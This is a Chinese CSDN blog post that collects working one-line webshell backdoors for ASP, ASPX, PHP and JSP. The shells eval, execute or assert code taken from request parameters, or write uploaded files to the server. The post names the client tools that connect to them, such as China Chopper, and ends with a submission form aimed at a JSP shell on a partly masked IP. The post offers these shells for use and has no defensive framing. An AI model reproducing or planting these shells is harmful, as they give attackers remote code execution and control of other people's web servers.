一句话

最新推荐文章于 2018-08-06 20:09:01 发布
最新推荐文章于 2018-08-06 20:09:01 发布
阅读量622 收藏 1
点赞数
分类专栏: 【网文】技术文章
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/janus_java/article/details/54142826
版权
ASP

<%eval request("bkhack")%>
程序代码
<%execute request("bkhack")%>
程序代码
<%execute(request("bkhack"))%>
程序代码
<%execute request("bkhack")%><%'<% loop <%:%>
程序后门代码
<%'<% loop <%:%><%execute request("bkhack")%>
程序后门代码
<%execute request("bkhack")'<% loop <%:%>[code]
[code]<script language=vbs runat=server>eval(request("bkhack"))</script>
程序代码
%><%Eval(Request(chr(35)))%><%
程序代码
<%eval request("bkhack")%>
程序后门代码
<%ExecuteGlobal request("bkhack")%>
程序代码
if Request("bkhack")<>"" then ExecuteGlobal request("bkhack") end if
//容错代码
程序代码
<%@LANGUAGE="JAVASCRIPT" CODEPAGE="65001"%>
<%
var lcx = {'名字' : Request.form('#'), '性别' : eval, '年龄' : '18', '昵称' : '请叫我一声老大'};
lcx.性别((lcx.名字)+'');
%>
//使用冰狐一句话客户端链接
程序后门代码
<%
Set o = Server.CreateObject("ScriptControl")
o.language = "vbscript"
o.addcode(Request("SubCode")) '参数SubCode作为过程代码
o.run "e",Server,Response,Request,Application,Session,Error '参数名e 调用之,同时压入6个基对象作为参数
%>


PHP

程序后门代码
<?php eval($_POST[bkhack])?>
程序代码
<?php @eval($_POST[bkhack])?>
//容错代码
程序代码
<?php assert($_POST[bkhack]);?>
//使用lanker一句话客户端的专家模式执行相关的php语句
程序代码
<?$_POST['sa']($_POST['bkhack']);?>
程序代码
<?$_POST['sa']($_POST['bkhack'],$_POST['sc'])?>
程序代码
<?php
@preg_replace("/[email]/e",$_POST['bkhack'],"error");
?>
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
程序代码
<O>h=@eval($_POST[bkhack]);</O>
程序代码
<script language="php">@eval($_POST[bkhack])</script>
//绕过<?限制的一句话

ASPX

程序代码
<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
程序代码
<%@ Page Language="Jscript" validateRequest="false" %><%Response.Write(eval(Request.Item["w"],"unsafe"));%>
//Jscript的asp.net一句话
程序后门代码
<%if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(Request["f"]) ); }%>
//C#的asp.net一句话
程序代码
<% If Request.Files.Count <> 0 Then Request.Files(0).SaveAs(Server.MapPath(Request("f")) ) %>

JSP

程序后门代码
<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%>
提交客户端
程序后门代码
<form action="http://59.x.x.x:8080/scdc/bob.jsp?f=fuckjp.jsp" method="post">
<textarea name=t cols=120 rows=10 width=45>your code</textarea>
<center>

<input type=submit value="提交">
</form>
木炎焱
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
UEditor 任意文件上传漏洞
mei_13的博客
07-08 1万+
1 漏洞简介 1.1 漏洞描述 Ueditor是百度开发的一个网站编辑器,目前已经不对其进行后续开发和更新,该漏洞只存在于该编辑器的.net版本。其他的php,jsp,asp版本不受此UEditor的漏洞的影响,.net存在任意文件上传,绕过文件格式的限制,在获取远程资源的时候并没有对远程文件的格式进行严格的过滤与判断。 1.2 影响范围 该漏洞影响UEditor的.Net版本,其它语言版本暂时未受影响。 1.3 漏洞原理 漏洞的成因是在获取图片资源时仅检查了ContentType,导致可以绕过达
GET 与POST一句话理解!
693的专栏
11-12 962
get方法会在IE地址栏里显示表示你提交时候所带的值post方法不会
Aspx 一句话木马和客户端(备用)
eldn__的专栏
04-18 1638
以下是引用片段: 这个一句话不用说了!我之前已经发表文章讲解过! client端HTML页面代码如下 以下是引用片段: I.S.T.O ASPX-C/S-SHELL 1.0 by kj021320 body,td{font-size: 12px;} table{T:expression(this.border='1',this.borderColorLigh
一句话木马集合
cnbird's blog
08-08 5570
asp一句话木马 程序代码 程序代码 程序代码 程序代码 程序代码 程序代码 [code] [code]eval_r(request("a")) 程序代码 %> 程序代码 程序代码 程序代码 if Request("a") //容错代码 程序代码 var lcx = {'名字' : Request.form('#'), '性
JSP一句话后门
10-31
JSP一句话后门 JSP一句话后门是指在Java Server Pages(JSP)中使用的一种后门技术,该技术允许攻击者在服务器上写入恶意文件,从而控制服务器的行为。 知识点1: JSP是什么? JSP全名为Java Server Pages,是一种...
asp一句话.zip
06-28
"asp一句话.zip"这个文件可能包含了一个或多个这样的后门示例。 1. ASP基础: ASP是Internet Information Services (IIS)的一部分,它允许开发者使用VBScript或JScript等脚本语言创建动态网页。在服务器上运行的...
一句话木马要点和防范注意事项
最新发布
05-24
"一句话木马",顾名思义,是指利用简短的代码实现的恶意程序,它通常隐藏在网页、脚本或者其他可执行文件中,通过Web服务的漏洞进行植入,以达到远程控制或非法获取服务器权限的目的。这类木马因为其简洁高效的特点...
webshell一句话
08-26
php,jsp,asp等脚本的常用一句话拿webshell,然后用菜刀连接即可
PHP隐形一句话后门,和ThinkPHP框架加密码程序(base64_decode)
10-28
隐形一句话后门是黑客植入Web应用中的隐蔽代码,通常用于远程控制和恶意活动。这种后门很难被检测到,因为它通常被编码和隐藏在正常代码中。 首先,我们看到一个名为`mm.php`的文件,其内容包含`($_POST[c]);?>`。...
asp.net jscript 一句话木马
IT技术宅-北方的刀郎
03-21 2636
min.aspx复制代码代码如下:复制代码代码如下:     td,table,tr {   list-style: none;   font-family: Verdana, Arial, Helvetica, sans-serif;   font-size: 12px;   line-height: 180%; } input,textarea {     width:780px; }  as
网站页面底部的著作权(版权)声明应该怎么写?
weixin_34245749的博客
07-05 3584
网站建设中的知识产权问题主要存在于主页、链接、网页信息、技术措施和权利管理信息中。 随着互联网的发展,大大小小的网站冒出来很多,那么网站的底部信息到底应该写什么? 和目前我国通行的大部分互联网惯例一样,网站声明著作权的做法起源于美国。相应的,参考标准和格式也是应用的美国版权局的说明,关于书籍,电影,唱片,网页,软件等的著作权声明,必须包含这三部分:   1:英文单词“Copyright”(直译为版...
[总目录]JanusGraph重要笔记
专注交流
08-06 3481
如果对您有有用,麻烦右边点个赞哦~~ 资料查阅 先查https://docs.janusgraph.org https://docs.janusgraph.org查不到查http://s3.thinkaurelius.com/docs/titan/1.0.0/ 之后试试StackOverflow 远程连接JanusGraph Server(即gremlin-server) ...
经典的 Aspx一句话木马使用
tuo9999的专栏
07-12 1695
1. 相当于 ASP 一句话木马 : 顺序代码 alter databas pub set RECOVERY FULL-- creat tabl pubs.dbo.cmd a imag backup log pub to disk = 'c:/TM' with init fals ;ow.Writ Request.Params["l"] ;ow.Clos %> ' insert into pubs.dbo.cmd a valu '<%System.IO.StreamWrit
ASP一句话木马大全
eldn__的专栏
12-30 2万+
"" Then Execute(Request("MH"))%> ""then session("MH")=request("MH"):end if:if session("MH") execute request("MH") 1 asp一句话木马 一句话木马 服务器端 带验证: ——————————————cmd.asp———————————————— <%
ASPX一句话木马--终极版&详细分析(ASP-EXECUTE VS ASPX-EVAL)
热门推荐
Quantum Intelligence
08-04 5万+
首先回顾一下以前ASP一句话的经典木马吧!"" then execute request("nonamed")%>VBS中execute就是动态运行指定的代码而JSCRIPT中也同样有eval函数可以实现,也就是说ASP一句话木马也有个版本是采用JSCRIPT的 eval的!网上也有例子我就不多说了!.....然后解析语言终究发展成为中间代码例如java .net  动态执行也就不存在
添加了ValidateRequest="false"仍然报错的解决办法
止水
09-11 8174
在文本框传递HTML代码时默认是不允许的,会提示有潜在危险字符,只要在页头的指令中加ValidateRequest="false" 就可以解决,如下所示: 或查看配置文件中是否有同样的设置,如: 若上述操作后仍然报错,可在配置文件中加入节如下:
放假期间网站被挂马的解决办法
网站安全专家
06-11 904
放假期间网站被挂马的解决办法青岛峰会期间本来想给自己放几天假的,因为网站的挂马给泡汤了,打开网站首页,使用浏览器的源代码功能,发现自己网站的首页多了很多木马代码,于是我连接FTP查看网站首页的代码中发现了这个挂马代码,下面我把代码贴出来 :&lt;?phperror_reporting(0);if(eregi('google|soso|sogou|baidu',$_SERVER['HTTP_REF...
Linux一句话精彩问答精华版
"Linux一句话.pdf" 是一个由陈绪编译的关于Linux精彩问答的小文档,内容涵盖了许多实用的Linux操作技巧和问题解答。 该文档主要分为不同的篇章,其中包括“网络无关篇”,涉及了从基础系统配置到高级操作的各种问题...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值